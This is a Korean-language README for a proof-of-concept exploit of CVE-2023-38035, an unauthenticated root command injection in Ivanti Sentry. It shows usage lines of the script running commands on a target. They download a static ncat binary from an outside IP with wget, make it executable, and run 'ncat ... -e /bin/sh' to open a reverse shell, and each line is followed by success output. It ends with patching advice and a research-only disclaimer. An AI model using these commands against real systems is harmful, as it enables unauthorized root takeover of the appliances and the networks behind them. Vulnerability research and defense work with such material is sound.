
CVE-2023-38035에 대한 개념 증명(PoC) 익스플로잇으로, Ivanti Sentry의 인증되지 않은 명령 주입 취약점을 악용하여 임의의 루트 명령 실행과 ncat을 통한 리버스 셸을 가능하게 합니다.
Ivanti Sentry에 영향을 미치는 CVE-2023-38035에 대한 POC
취약점에 대한 기술적 근본 원인 분석은 다음 블로그에서 확인할 수 있습니다: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
이 POC는 인증되지 않은 명령 삽입을 악용하여 root 사용자로 임의 명령을 실행합니다.
실행 컨텍스트는 명령 파이핑을 허용하지 않으며, 시스템에 쉽게 악용 가능한 바이너리가 포함되어 있지 않으므로 명령을 연결하여 https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat 같은 곳에서 정적 ncat을 다운로드할 수 있습니다.
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Ivanti 권고의 지침에 따라 최신 버전으로 업데이트하십시오
이 소프트웨어는 순수하게 학술 연구 및 효과적인 방어 기술 개발 목적으로 만들어졌으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용해서는 안 됩니다. 프로젝트 유지 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.